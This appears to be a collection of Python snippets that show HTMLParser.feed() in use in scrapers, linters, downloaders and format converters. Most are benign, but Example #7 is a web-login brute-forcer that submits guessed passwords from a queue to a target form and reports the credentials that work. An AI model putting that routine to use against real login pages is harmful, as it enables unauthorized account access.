Example #1
    def check_html_tags_and_attributes(self):
        """This function checks the indentation of lines in HTML files.

        Returns:
            TaskResult. A TaskResult object representing the result of the lint
            check.
        """
        html_files_to_lint = self.html_filepaths
        failed = False
        error_messages = []
        name = 'HTML tag and attribute'

        for filepath in html_files_to_lint:
            file_content = self.file_cache.read(filepath)
            file_lines = self.file_cache.readlines(filepath)
            parser = CustomHTMLParser(filepath, file_lines, self.debug)
            parser.feed(file_content)

            if len(parser.tag_stack) != 0:
                raise TagMismatchException('Error in file %s\n' % filepath)

            if parser.failed:
                error_messages.extend(parser.error_messages)
                failed = True
        return concurrent_task_utils.TaskResult(
            name, failed, error_messages, error_messages)
Example #2
def fetch(url):
    if url.startswith("ipfs:/"):
        url = "https://ipfs.io/%s" % url[6:]
    elif url.startswith("fs:/"):
        url = "https://ipfs.io/%s" % url[4:]

    if url == "-":
        return sys.stdin.read()

    if url.startswith("http:") or url.startswith("https:"):
        response = urllib.request.urlopen(url)
        data = response.read().decode(errors='replace')

        content_type = response.headers['Content-Type']
        if content_type and content_type.startswith('text/html'):
            parser = Parser()
            parser.feed(data)
            url = parser.url

            if not url:
                raise LoadError("""<link rel="alternate" type="application/asciicast+json" href="..."> not found in fetched HTML document""")

            return fetch(url)

        return data

    with open(url, 'r') as f:
        return f.read()
Example #3
def download_problem(contest_uri, problem):
    problem_uri = contest_uri + '/problem/' + problem
    print('Retrieving', problem_uri, '...')
    sys.stdout.flush()
    problem_html = urllib.request.urlopen(problem_uri).read().decode('utf-8')
    print('Retrieved problem {} ({} bytes).'.format(problem, len(problem_html)))

    # Hack for codeforces HTML errors
    problem_html = problem_html.replace('<p</p>', '<p></p>')
    problem_html = problem_html.replace('<ul</ul>', '<ul></ul>')
    problem_html = problem_html.replace('<div class="sample-test"<', '<div class="sample-test"><')

    parser = ProblemHTMLParser()
    try:
        parser.feed(problem_html)
    except:
        print(problem_html, file=sys.stderr)
        raise

    examples = parser.getExamples()

    problem_dir = problem.lower()
    if not os.path.isdir(problem_dir):
        os.mkdir(problem_dir)

    for i, example in enumerate(examples, 1):
        input_path = os.path.join(problem_dir, 'in{}'.format(i))
        with open(input_path, 'w') as f:
            f.write(example[0])

        output_path = os.path.join(problem_dir, 'out{}'.format(i))
        with open(output_path, 'w') as f:
            f.write(example[1])

    print('Wrote {} examples for problem {}.'.format(len(examples), problem))
Example #4
async def main(request):
    body = await request.read()

    secret = os.environ['GH_SECRET']
    oauth_token = os.environ['GH_AUTH']
    event = sansio.Event.from_http(
        request.headers,
        body,
        secret=secret
    )

    async with aiohttp.ClientSession() as session:
        gh = gh_aiohttp.GitHubAPI(session, "asv-bot", oauth_token=oauth_token)
        await router.dispatch(event, gh)
        response = await session.get("https://pandas.pydata.org/speed")
        text = await response.text()
        parser = ProjectParser()
        parser.feed(text)
        projects = parser.projects
        # today = datetime.date.today()
        today = datetime.date(2019, 4, 5)
        futures = [
            handle_regressions(project, gh, since=today)
            for project in projects
        ]
        await asyncio.gather(*futures)

    return web.Response(status=200)
Example #5
def fetch(url):
    if url.startswith("ipfs:/"):
        url = "https://ipfs.io/%s" % url[6:]
    elif url.startswith("fs:/"):
        url = "https://ipfs.io/%s" % url[4:]

    if url == "-":
        return sys.stdin.read()

    if url.startswith("http:") or url.startswith("https:"):
        response = urllib.request.urlopen(url)
        data = response.read().decode(errors='replace')

        content_type = response.headers['Content-Type']
        if content_type and content_type.startswith('text/html'):
            parser = Parser()
            parser.feed(data)
            url = parser.url

            if not url:
                raise LoadError(
                    """<link rel="alternate" type="application/asciicast+json" href="..."> not found in fetched HTML document"""
                )

            return fetch(url)

        return data

    with open(url, 'r') as f:
        return f.read()
Example #6
        def run(self):

            self.parent.visited += [self.url]

            if self.gleb>0:
                parser = self.HParser(self.url)

                contents = ""
                try:
                    response = urlopen(self.url)
                    contents = response.read().decode('utf-8')
                except HTTPError:
                    pass
                parser.feed(contents)

                parser.close()
                for v in parser.vals:  # crawl the subpages
                    if v not in self.parent.visited:
                        thr = Probe.Thr(v,self.fun,self.gleb-1, self.parent)
                        thr.start()
                        self.parent.threads += [thr]
                        self.children += [thr]

            self.fun(self.url)  # run the action on the current page

            # wait for the child threads
            for t in self.children:
                t.join()
Example #7
 def web_bruter(self):
     while not self.password_q.empty() and not self.found:
         brute = self.password_q.get().rstrip()
         # http.cookiejar replaces the Python 2 "cookielib" module
         jar = http.cookiejar.FileCookieJar("cookies")
         opener = urllib.request.build_opener(
             urllib.request.HTTPCookieProcessor(jar))
         response = opener.open(self.target_get_form_url)
         page = response.read().decode()
         print(
             f"[*] Trying {self.username} : {brute} ({self.password_q.qsize()} Left)"
         )
         # parse out the hidden fields
         parser = self.parser_class()
         parser.feed(page)
         post_tags = parser.tag_results
         # add our username and password fields
         post_tags[self.username_field] = self.username
         post_tags[self.password_field] = brute
         # the POST body must be bytes
         login_data = urllib.parse.urlencode(post_tags).encode()
         login_response = opener.open(self.target_post_form_url, login_data)
         login_result = login_response.read()
         if self.success_checker(login_result):
             self.found = True
             print("[*] Bruteforce Successful!")
             print(f"[*] Username : {self.username}")
             print(f"[*] Password : {brute}")
             print("[*] Waiting for other threads to exit!")
Example #8
def fetch_article_contents(url):
    log_message('fetch_article_contents: `{}`', url)
    contents = urllib.request.urlopen(url)
    parser = ArticleParser()
    parser.feed(contents.read().decode('utf-8'))
    text = ''.join(['<p>{}</p>'.format(s) for s in parser.paragraphs])
    return (contents.geturl(), text)
Example #9
def main(argv=None):
    if argv is None:
        argv = sys.argv[1:]

    output_dir = pathlib.Path(argv[0])
    input_dir = pathlib.Path(argv[1])
    json_filepaths = input_dir.glob("*.json")

    for input_file in json_filepaths:
        parser = ImmunizeNVParser()
        slug = input_file.name.split(".", maxsplit=1)[0]
        output_file = output_dir / f"{slug}.parsed.ndjson"

        with open(input_file, "r") as in_fh:
            content = in_fh.read()
            html_data = extract_locator_data(content)
            parser.feed(html_data)

        with open(output_file, "w") as out_fh:
            parsed = parser.result
            for k in sorted(parsed.keys()):
                parsed[k]["id"] = generate_id(parsed[k]["title"])
                line = json.dumps(parsed[k])
                out_fh.write(line)
                out_fh.write("\n")
Example #10
def identify_html_refs(path, get_ref):
    parser = LinkProcessor(get_ref,
                           containing_component=get_component(path))
    with path.open('r') as f:
        parser.feed(f.read())
    with path.open('r') as f:
        parser.feed(f.read())
Example #11
def clone_from_url(url, branch=None):
    page = urllib.request.urlopen(url)
    parser = HTMLParser()
    parser.feed(page.read().decode("utf-8"))
    title = parser.title
    if not title:
        raise RuntimeError("No title found for %s" % url)
    match = re.match(r"Issue\s+(\d+)\:\s+(.*?) - Python tracker", title)
    if match:
        number, name = match.groups()
    else:
        raise RuntimeError("No suitable title found for %s" % url)
    clone_name = clone_from_name("issue%s-%s" % (number, name), branch)

    #
    # Create a shortcut inside the new clone pointing to
    # the issue page in bugs.python.org
    #
    shortcut = pythoncom.CoCreateInstance (
      shell.CLSID_InternetShortcut,
      None,
      pythoncom.CLSCTX_INPROC_SERVER,
      shell.IID_IUniformResourceLocator
    )
    shortcut.SetURL(url)
    persist_file = shortcut.QueryInterface(pythoncom.IID_IPersistFile)
    path = os.path.abspath(os.path.join(clone_name, "issue%s.url" % number))
    persist_file.Save(path, 0)

    return clone_name
Example #12
    def set_asciidoc_attributes(self, release_download_url):
        response = requests.get(release_download_url)

        if not response.ok:
            raise IOError(
                "Failed to retrieve download information from: {}".format(
                    release_download_url))

        parser = DownloadsHTMLParser()
        parser.feed(response.text)

        for version in parser.version_list:
            version_key = version.key

            # Add the latest version as "latest" as well as its version number.
            if parser.latest == version.release_number:
                self._asciidoc_attributes["latest"] = {
                    "name": version.name,
                    "date": version.date
                }

            self._asciidoc_attributes[version_key] = {
                "name": version.name,
                "date": version.date
            }
        self._asciidoc_attributes[
            'url_downloads_cassandra'] = release_download_url
Example #13
def github_contrib(user, year):
    """ Get GitHub user daily contribution """

    # Check for a cached version (file)
    filename = "github-{0}-{1}.html".format(user, year)
    if os.path.exists(filename):
        with open(filename) as file:
            contents = file.read()
    # Else get file from GitHub
    else:
        url = "https://github.com/users/{0}/contributions?to={1}-12-31"
        url = url.format(user, year)
        contents = urllib.request.urlopen(url).read().decode("utf-8")
        with open(filename, "w") as file:
            file.write(contents)

    # Parse result (html)
    n = 1 + (date(year, 12, 31) - date(year, 1, 1)).days
    C = -np.ones(n, dtype=int)

    class HTMLParser(html.parser.HTMLParser):
        def handle_starttag(self, tag, attrs):
            if tag == "rect":
                data = {key: value for (key, value) in attrs}
                date = dateutil.parser.parse(data["data-date"])
                count = int(data["data-count"])
                day = date.timetuple().tm_yday - 1
                if count > 0:
                    C[day] = count

    parser = HTMLParser()
    parser.feed(contents)
    return C
Example #14
def scrape(html_content):
    """
    This function could have been a "private" utility but I left it "public" (note the quotation marks, as in Python
    there is no such thing as public or private access identifiers) because this scraping functionality could certainly
    be invoked passing raw HTML content, effectively circumventing the actual HTTP request. This has been useful, for
    instance, for unit testing this behavior.
    :param html_content: a string containing the actual HTML content. Cannot be None or empty.
    :return: a dictionary with two keys: "total" and "top5", containing the total number of elements and the count of
    the top 5 ones, respectively.
    """
    if not html_content:
        raise ValueError('Input is empty')

    parser = HtmlElementsCounter()
    parser.feed(html_content)
    parser.close()  # instructs the parser to consume the input entirely

    total = sum(parser.occurrences_by_tag.values())

    # if the input only has N different elements (N < 5), this dictionary will hold exactly N entries
    top5_elements_with_occurrences = sorted(parser.occurrences_by_tag.items(),
                                            reverse=True,
                                            key=lambda x: x[1])[:5]

    return dict(total=total, top5=top5_elements_with_occurrences)
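The HtmlElementsCounter class used above is not shown in this example; purely as an assumed sketch, a tag-counting parser exposing the same occurrences_by_tag attribute, plus a small usage call, could look like this:

# Assumed sketch only: the real HtmlElementsCounter is not shown above.
import html.parser
from collections import Counter

class TagCounter(html.parser.HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.occurrences_by_tag = Counter()

    def handle_starttag(self, tag, attrs):
        # count every opening tag; void elements such as <br> also arrive here
        self.occurrences_by_tag[tag] += 1

counter = TagCounter()
counter.feed('<html><body><p>one</p><p>two</p><br></body></html>')
counter.close()
print(counter.occurrences_by_tag.most_common(5))
# [('p', 2), ('html', 1), ('body', 1), ('br', 1)]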
Example #15
def fetch_card(card_name, dest_file=None):
    """
    Gets card_name's image from magiccards.info and writes it to dest_file.

    @param card_name: the name of the magic card.
    @param dest_file: the file to write the image file to, defaulting to the
                      current directory and card_name as file name.
    """
    url = "http://magiccards.info/query?q=!{}&v=card&s=cname".format(
        urllib.parse.quote(card_name))
    # Can raise URLError
    response = urllib.request.urlopen(url)

    #print(response.info())

    file_contents = response.read().decode("utf-8")
    #with open("test.html", "w") as html_file:
    #    html_file.write(file_contents)

    #file_contents = open("test.html", "r").read()

    parser = ImageTagFinder(card_name, strict=True)
    parser.feed(file_contents)

    print(parser.result_url)

    if parser.result_url is None:
        raise RuntimeError("Couldn't find image for \"{}\"".format(card_name))

    image = urllib.request.urlopen(parser.result_url)

    with open(
        "{}.jpg".format(card_name.lower()) if dest_file is None else dest_file,
        "wb") as image_file:
        image_file.write(image.read())
Example #16
    def getentry(self):
        # Start with the entry from the parent.
        entry = FileHandler.getentry(self)
        parser = HTMLTitleParser()
        file = self.vfs.open(self.getselector(), "rt")
        try:
            while not parser.gotcompletetitle:
                line = file.readline()
                if not line:
                    break
                parser.feed(line)
            parser.close()
        except html.parser.HTMLParseError:
            # Parse error?  Stop parsing, go to here.  We can still
            # return a title if the parse error happened after we got
            # the title.
            pass

        file.close()
        # OK, we've parsed the file and exited because of either an EOF
        # or a complete title (or error).  Now, figure out what happened.

        if parser.gotcompletetitle:
            # Convert all whitespace sequences to a single space.
            # Removes newlines, tabs, etc.  Good for presentation
            # and for security.
            title = re.sub(r'\s+', ' ', parser.titlestr)
            entry.setname(title)
        return entry
Example #17
def xhamster_comment(link):
    class Parser(html.parser.HTMLParser):
        comments = []
        in_comments_block = False
        in_comment = False

        def handle_starttag(self, tag, attrs):
            if tag == "div" and ("id", "commentList") in attrs:
                self.in_comments_block = True
            self.in_comment = self.in_comments_block and tag == "div" and ("class", "oh") in attrs

        def handle_endtag(self, tag):
            self.in_comment = False

        def handle_data(self, data):
            if not self.in_comment:
                return
            cleaned = data.replace("\r", "").replace("\n", "").replace("\\", "").strip()
            if cleaned.isprintable() and len(cleaned) > 0:
                self.comments.append(cleaned)

        def error(self, message):
            pass

    parser = Parser(convert_charrefs=True)

    try:
        response = requests.get(link, timeout=timeout, headers={"User-Agent": random.choice(user_agents)})
        parser.feed(response.text)
    except:
        return "couldn't load comments :("

    comments = sorted(parser.comments, key=lambda x: len(x), reverse=True)
    return comments[0] if len(comments) > 0 else "no comments :("
Example #18
def test(client, page):
    response = client.get(page, follow_redirects=True)
    assert response.status_code == 200
    parser = PageParser()
    parser.feed(response.data.decode(response.charset))
    for url in parser.urls:
        requests.request("HEAD", url).raise_for_status()
Example #19
def main():
    import sys

    parser = MyHTMLParser()

    if len(sys.argv) > 1:
        url = sys.argv[1]
    else:
        url = "http://instagram.com/sarah3llen"

    try:
        response = urllib.request.urlopen(url, timeout=5)
        contentType = response.getheader("Content-Type")

        if "text/html" in contentType:
            data = response.read()
            html = data.decode("utf-8")

            parser.feed(html)

            if len(parser.ogpTitle) > len(parser.title):
                title = parser.ogpTitle
            else:
                title = parser.title.replace("\n", "")
        else:
            title = None
    except:
        title = None

    print(title)
Example #20
def makeSampleHTTPRequest(url):  #non-real time
    #resp = urllib.request.urlopen(url)
    #print(resp.read())

    # practice parsing a URL
    link = "https://docs.python.org/3.6/library/urllib.parse.html#module-urllib.parse"
    urlTuple = urllib.parse.urlparse(link)
    #print(urlTuple)

    # make a POST request to search for "robot"
    link = "https://pythonprogramming.net/search"
    # build the request data: in this case just the query value
    # urllib.parse.urlencode accepts a dict of key/value pairs (or a sequence of
    #  2-tuples) and encodes it into URL query format
    # The resulting string is a series of key=value pairs separated by '&' characters,
    #  where both key and value are quoted using the quote_via function
    # then encode the URL-formatted string to bytes, as accepted by the server
    values = {'q': 'robot'}
    data = urllib.parse.urlencode(values)
    data = data.encode('utf-8')  # now bytes, in the encoding the server accepts
    #make a Request obj
    req = urllib.request.Request(link, data, method='POST')
    with urllib.request.urlopen(
            req) as resp:  #get response obj, catching exception
        parser = MyHTMLParser()
        text = resp.read()
        #parser.feed('<html><head><title>Test</title></head> <body><h1>Parse me!</h1></body></html>')
        parser.feed(text.decode())
        #print(pars)
        #print(resp.read())

    return None
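The comments above walk through what urllib.parse.urlencode does; a tiny standalone snippet (no network access involved) illustrating exactly that behaviour:

# Standalone illustration of the urlencode behaviour described above.
import urllib.parse

values = {'q': 'robot', 'page': 2}
encoded = urllib.parse.urlencode(values)
print(encoded)                   # q=robot&page=2  (key=value pairs joined by '&')
print(encoded.encode('utf-8'))   # b'q=robot&page=2', the bytes form used as a POST body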
Example #21
 def count(filename):
     if not HtmlWordCounter.can_count(filename):
         return 0
     parser = HtmlWordCounter.__HtmlParser()
     with open(filename, encoding="utf-8") as file:
         parser.feed(file.read())
     return parser.count
Example #22
def simplify_html(s):
    """Make a real HTML text compatible with Telegram's pseudo-HTML"""

    parser = _HtmlSimplifying()
    parser.feed(s)
    parser.close()
    return parser.result
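The _HtmlSimplifying parser is defined elsewhere in that project; purely as a sketch, and assuming Telegram's documented tag whitelist (b, i, u, s, code, pre, a), such a simplifier could be approximated like this:

# Rough sketch only: the real _HtmlSimplifying is not shown above, and the exact
# tag whitelist is an assumption based on Telegram's HTML subset.
import html
import html.parser

ALLOWED_TAGS = {'b', 'strong', 'i', 'em', 'u', 's', 'code', 'pre', 'a'}

class SimplifyingParser(html.parser.HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.result = ''

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            href = dict(attrs).get('href') or ''
            self.result += '<a href="{}">'.format(html.escape(href, quote=True))
        elif tag in ALLOWED_TAGS:
            self.result += '<{}>'.format(tag)
        elif tag in ('br', 'p', 'div'):
            self.result += '\n'

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.result += '</{}>'.format(tag)

    def handle_data(self, data):
        self.result += html.escape(data)

p = SimplifyingParser()
p.feed('<div><b>Hi</b> <span>there</span> <a href="https://example.org">x</a></div>')
p.close()
print(p.result)  # -> newline, then: <b>Hi</b> there <a href="https://example.org">x</a>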
Example #23
    def user_login(self, username, password):
        response = self._get_opener().open(CONF.dashboard.dashboard_url).read()

        # Grab the CSRF token and default region
        parser = HorizonHTMLParser()
        parser.feed(response.decode("utf-8"))

        # construct login url for dashboard, discovery accommodates non-/ web
        # root for dashboard
        login_url = parse.urljoin(CONF.dashboard.dashboard_url, parser.login)

        # Prepare login form request
        req = request.Request(login_url)
        req.add_header('Content-type', 'application/x-www-form-urlencoded')
        req.add_header('Referer', CONF.dashboard.dashboard_url)

        # Pass the default domain name regardless of the auth version in order
        # to test the scenario of when horizon is running with keystone v3
        params = {
            'username': username,
            'password': password,
            'region': parser.region,
            'domain': CONF.auth.default_credentials_domain_name,
            'csrfmiddlewaretoken': parser.csrf_token
        }
        self._get_opener().open(req, parse.urlencode(params).encode())
Example #24
 def count(filename):
     if not HtmlWordCounter.can_count(filename):
         return 0
     parser = HtmlWordCounter.__HtmlParser()
     with open(filename, encoding="utf-8") as file:
         parser.feed(file.read())
     return parser.count
Example #25
def get_dependencies(path):
    deps = set()
    parser = DependenciesParser(deps.add)
    with open(path) as f:
        parser.feed(f.read())
    parser.close()
    return iter(deps)
Example #26
def forum_attachments(attach_content):
    parser = p_attachments()
    parser.feed(attach_content)
    markdown_attachments = '\n\n>Attachments:\n'
    for item in parser._a:
        markdown_attachments += '\n>* ' + item
    return markdown_attachments
Example #27
def html_to_markdown(content, host):
    with open('debug/out', 'w') as f:
        f.write(content)
    parser = guildwars2_html2markdown.Htmlparser()
    parser.convert_charrefs = True
    parser.host = 'https://' + host
    content = content.replace('\n', '\n>')
    parser.feed(content)
    # content = tag_bold(content)
    # content = tag_italic(content)
    # content = tag_list(content)
    # content = tag_superscript(content)
    # content = tag_strikethrough(content)
    # content = tag_underline(content)
    # content = tag_breakrow(content)
    # content = tag_h1(content)
    # content = tag_h2(content)
    # content = tag_h3(content)
    # content = tag_h4(content)
    # content = tag_h5(content)
    # content = tag_h6(content)
    # content = tag_hr(content)
    # content = tag_screenshot(content, host)
    # content = tag_paragraph(content)
    # content = tag_iframe(content, host)
    # content = tag_href(content, host)
    # content = tag_img(content, host)
    # content = tag_quote(content, host)
    # content = tag_spoiler(content, host)
    # content = tag_object(content)
    # content = content.strip('\n')
    # content = '>' + content.replace('\n', '\n>')
    # content = tag_other(content)
    print(parser.result)
    return parser.result
Example #28
def main():
    """Make all of the above work together to finally print the RSS feed."""
    # Initial request
    html_string = get_response_body('/archive?type=episodes')
    # Prepare headers for following requests
    HEADERS['Referer'] = (
        'https://www.thisamericanlife.org/archive?type=episodes'
    )
    HEADERS['X-Requested-With'] = 'XMLHttpRequest'
    parser = Parser()
    parser.feed(html_string)
    tree = parser.close()
    episodes = findall_episodes(tree)
    count = tree.find('.//div[@class="count-sort"]/div[@class="count"]').text
    count = int(count.split()[2])
    for page in range(int(count / 48)):
        page = page + 1
        time.sleep(1)
        json_string = get_response_body(f'/archive?type=episodes&page={page}')
        html_string = json.loads(json_string)['html']
        parser = Parser()
        parser.feed(html_string)
        tree = parser.close()
        new_episodes = findall_episodes(tree)
        episodes = episodes + new_episodes

    RSS['rss']['channel']['item'] = episodes
    xml_tree = dictionary_to_xml(RSS)
    xml_string = xml.etree.ElementTree.tostring(
        xml_tree, encoding='utf-8', method='xml'
    ).decode()
    print(xml_string)
Example #29
async def search(title, title_types, year=None):
    '''Search by title in the IMDB site.
    Each entry of title_types must be one of: 'Movie', 'TV Series', 'Video', 'Short',
    'TV Mini-Series', 'TV Movie', 'TV Episode' or 'Video Game'.
    '''
    # Check that the type of title is correct
    for t in title_types:
        if t not in _SEARCH_TYPES:
            raise ValueError("wrong type '{}'".format(t))
    # Build the URL of the search page
    search_attributes = {'ref_': 'nv_sr_fn', 's': 'tt', 'q': title}
    url = '{}?{}'.format(_IMDB_SEARCH_URL,
                         urllib.parse.urlencode(search_attributes))

    # Fetch the list of titles
    http_client = tornado.httpclient.AsyncHTTPClient()
    response = await http_client.fetch(url, headers=_HTTP_HEADERS)

    # Parse the desired information from the result
    parser = SearchParser()
    parser.feed(response.body.decode('utf-8'))

    # Return the list of titles
    # Keep only the titles with the right type or, if the year is given, those
    # corresponding to that year.
    return [
        a for a in parser.results if a['type'] in title_types and (
            year is None or a['year'] == year or a['year'] == year - 1)
    ]
Example #30
def parse_category_ids(htmltext):
    """
        Example:
        <div data-id="601" class="catalogue-list-item">Analog ICs <br></div>

    """
    class CategoriesParser(html.parser.HTMLParser):
        categories = []
        last_category_id = None

        def handle_starttag(self, tag, attrs):
            category_id = None
            for name, value in attrs:
                if name == 'data-id':
                    category_id = value
            if category_id:
                self.last_category_id = category_id
                self.text = ''

        def handle_data(self, data):
            if self.last_category_id:
                self.text += data

        def handle_endtag(self, tag):
            if self.last_category_id:
                id_and_name = (self.last_category_id, self.text.strip())
                self.last_category_id = None
                self.text = ''
                self.categories.append(id_and_name)
                print(id_and_name)

    parser = CategoriesParser()
    parser.feed(htmltext)
    return parser.categories
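Using the sample markup quoted in the docstring above, a quick check of this function would look like:

# Quick check using the sample markup from the docstring above.
sample = '<div data-id="601" class="catalogue-list-item">Analog ICs <br></div>'
print(parse_category_ids(sample))
# expected output: [('601', 'Analog ICs')]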
Example #31
def parse(content, count):
    parser = OAParser(count)
    parser.feed(content)
    data = copy.deepcopy(parser.objects)
    # otherwise data from the previous parse would linger
    parser.clear()
    return data
Example #32
def parse(content, count):
    parser = OAParser(count)
    parser.feed(content)
    data = copy.deepcopy(parser.objects)
    # otherwise data from the previous parse would linger
    parser.clear()
    return data
Example #33
def parse_jobisjob_offers():
    offer_entries = []
    parser = JobIsJobParser()
    url = "/search?what=stage&where=rennes&category=IT&jobType=Stage"
    jobisjob_connection = http.client.HTTPConnection("www.jobisjob.fr")
    jobisjob_connection.connect()
    jobisjob_connection.request("GET", url)
    jobisjob_response = jobisjob_connection.getresponse()
    page = jobisjob_response.read().decode("utf-8")
    parser.feed(page)
    jobisjob_connection.close()
    next_urls = copy.deepcopy(parser.next_pages)
    offer_entries = offer_entries + parser.offer_entries
    for next_url in next_urls:
        parser = JobIsJobParser()
        jobisjob_connection = http.client.HTTPConnection("www.jobisjob.fr")
        jobisjob_connection.connect()
        jobisjob_connection.request("GET", next_url)
        jobisjob_response = jobisjob_connection.getresponse()
        if jobisjob_response.getcode() == 301:
            actual_url = jobisjob_response.getheader("Location")
            jobisjob_connection.close()
            if actual_url is None:
                continue
            jobisjob_connection = http.client.HTTPConnection("www.jobisjob.fr")
            jobisjob_connection.connect()
            jobisjob_connection.request("GET", actual_url)
            jobisjob_response = jobisjob_connection.getresponse()
        page = jobisjob_response.read().decode("utf-8")
        parser.feed(page)
        jobisjob_connection.close()
        offer_entries = offer_entries + parser.offer_entries
    return offer_entries
Example #34
def bibtex_entry_from_pmid(pmid: str) -> str:
    assert pmid.isdigit(), pmid
    resp = requests.get(_TEXMED_URL_PATTERN.format(pmid=pmid))
    resp.raise_for_status()
    parser = _TeXMedHtmlParser()
    parser.feed(resp.text)
    return parser.bibtex_entry
Example #35
def download_problem(contest_uri, problem):
    problem_uri = contest_uri + '/problem/' + problem
    print('Retrieving', problem_uri, '...')
    sys.stdout.flush()
    problem_html = urllib.request.urlopen(problem_uri).read().decode('utf-8')
    print('Retrieved problem {} ({} bytes).'.format(problem, len(problem_html)))

    # Hack for codeforces HTML errors
    problem_html = problem_html.replace('<p</p>', '<p></p>')
    problem_html = problem_html.replace('<ul</ul>', '<ul></ul>')
    problem_html = problem_html.replace('<div class="sample-test"<', '<div class="sample-test"><')

    parser = ProblemHTMLParser()
    try:
        parser.feed(problem_html)
    except:
        print(problem_html, file=sys.stderr)
        raise

    examples = parser.getExamples()

    problem_dir = problem.lower()
    if not os.path.isdir(problem_dir):
        os.mkdir(problem_dir)

    for i, example in enumerate(examples, 1):
        input_path = os.path.join(problem_dir, '{}.in.{}'.format(problem.lower(), i))
        with open(input_path, 'w') as f:
            f.write(example[0])

        output_path = os.path.join(problem_dir, '{}.out.{}'.format(problem.lower(), i))
        with open(output_path, 'w') as f:
            f.write(example[1])

    print('Wrote {} examples for problem {}.'.format(len(examples), problem))
Example #36
def forum_attachments(attach_content):
    parser = p_attachments()
    parser.feed(attach_content)
    markdown_attachments = '\n\n>Attachments:\n'
    for item in parser._a:
        markdown_attachments += '\n>* ' + item
    return markdown_attachments
Example #37
	def getCardDetails(self, uid):
		user = rfidUser()
		user.rfidCardUid = binascii.hexlify(uid).decode('ascii')

		# Query the ifaic staff ID using the card's UID
		logging.debug("request ifaic staff id")
		req = urllib.request.Request(url=self._url+'cards/{}'.format(binascii.hexlify(uid).decode('ascii')), headers={"Content-Type":"application/json"})
		userAndPass = base64.b64encode("{}:{}".format(self._user, self._password).encode()).decode("ascii")
		req.add_header("Authorization", 'Basic {:s}'.format(userAndPass))
		resp =  urllib.request.urlopen(req)
		body = resp.read()
		data = json.loads(body.decode())
		user.staffId = data['ikaFkaIdentStaffId']
		
		# Determine first and last name from the staff ID and the ifaic employee page
		#req = urllib.request.Request(url='https://ifaic.ika.rwth-aachen.de/info/mitarbeiterliste_komp.php')
		logging.debug("request ifaic user name")
		req = urllib.request.Request(url=self._mitarbeiterlisteUrl)
		resp =  urllib.request.urlopen(req)
		body = resp.read()
		logging.debug("parse response")
		# For faster parsing, an exception is raised as soon as a result is found
		try:
			parser = ifaicMitarbeiterlisteParser(user.staffId)
			parser.feed(body.decode('iso-8859-1'))
		except:
			logging.debug("parsed")
			logging.debug(parser.userName)
			user.surname = parser.surname
			user.givenName = parser.givenName
			user.userName = parser.userName
			return user
		return None
Example #38
 def auth_usr(email, password, client_id, scope, opener):
     print("TRY TO AUTH")
     # TODO: catch the exception
     login_page = "http://oauth.vk.com/oauth/authorize?" + \
             "redirect_uri=http://oauth.vk.com/blank.html&response_type=token&" + \
             "client_id=%s&scope=%s&display=wap" % (client_id, ",".join(scope))
     #print(login_page)
     auth_page = opener.open("http://oauth.vk.com/oauth/authorize?" + \
             "redirect_uri=http://oauth.vk.com/blank.html&response_type=token&" + \
             "client_id=%s&scope=%s&display=wap" % (client_id, ",".join(scope)))
     auth_page = auth_page.read()
     parser = AuthParser()
     parser.feed(str(auth_page))
     parser.close()
     if not parser.form_parsed or parser.url is None or "pass" not in parser.params or \
           "email" not in parser.params or parser.method != "POST":
         parser.error = "Some problems"
     if parser.error != "OK":
         return -1, -1, parser.error
     parser.params["email"] = email
     parser.params["pass"] = password
     parser.params["v"] = "5.2"
     # TODO: catch the exception
     response = opener.open(parser.url, urllib.parse.urlencode(parser.params).encode("UTF-8"))
     page = response.read()
     url = response.geturl()
     return page, url, parser.error
Example #39
        def handle_body(body):
            parser = HTMLTitleParser()
            parser.feed(body.decode('utf-8'))

            if parser.title_data == self._library_title:
                return True
            return False
Example #40
    def title(self, irc, msg, args, optlist, url):
        """[--no-filter] <url>

        Returns the HTML <title>...</title> of a URL.
        If --no-filter is given, the bot won't strip special chars (action,
        DCC, ...).
        """
        if not self._checkURLWhitelist(url):
            irc.error("This url is not on the whitelist.")
            return
        size = conf.supybot.protocols.http.peekSize()
        text = utils.web.getUrl(url, size=size)
        try:
            text = text.decode(utils.web.getEncoding(text) or 'utf8',
                    'replace')
        except:
            pass
        parser = Title()
        try:
            parser.feed(text)
        except html.parser.HTMLParseError:
            self.log.debug('Encountered a problem parsing %u.  Title may '
                           'already be set, though', url)
        if parser.title:
            title = utils.web.htmlToText(parser.title.strip())
            if not [y for x,y in optlist if x == 'no-filter']:
                for i in range(1, 4):
                    title = title.replace(chr(i), '')
            irc.reply(title)
        elif len(text) < size:
            irc.reply(_('That URL appears to have no HTML title.'))
        else:
            irc.reply(format(_('That URL appears to have no HTML title '
                             'within the first %S.'), size))
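The Title class is defined elsewhere in the plugin; a minimal, assumed stand-in that just captures the text of the <title> element might look like this:

# Minimal assumed stand-in for a <title>-capturing parser; the plugin's real
# Title class is not shown above.
import html.parser

class TitleParser(html.parser.HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.title = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == 'title':
            self._in_title = True
            self.title = ''

    def handle_data(self, data):
        if self._in_title:
            self.title += data

    def handle_endtag(self, tag):
        if tag == 'title':
            self._in_title = False

p = TitleParser()
p.feed('<html><head><title>Hello, world</title></head><body></body></html>')
print(p.title)  # Hello, world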
Example #41
    def _query_eol_list(self) -> typing.List[str]:
        """Scrape the FreeBSD website and return a list of EOL RELEASES."""
        request = urllib.request.Request(
            self.eol_url,
            headers={
                "Accept-Charset": "utf-8"
            }
        )
        self.logger.verbose(f"Downloading EOL info from {self.eol_url}")
        with urllib.request.urlopen(request) as response:  # nosec: B310

            response_code = response.getcode()
            if response_code != 200:  # noqa: T484
                libioc.errors.DownloadFailed(
                    topic="EOL Warnings",
                    code=response_code,
                    logger=self.logger,
                    level="warning"
                )
                return []

            parser = EOLParser()
            data = response.read().decode("utf-8", "ignore")
            parser.feed(data)
            parser.close()

            return parser.eol_releases
Example #42
def latest_simc_version(
        major_ver: str = _CURRENT_SIMC_VERSION,
        platform: Optional[str] = None) -> Optional[Tuple[str, str]]:
    """
    Checks the SimulationCraft nightly builds for the latest binary build.
    
    Args:
        major_ver: A major version of simc, eg: '910-01'.
        platform: Platform to check, eg: 'win64', 'macos', or None to auto-detect.

    Returns:
        tuple of (filename, git_commit) with the latest version.
    """
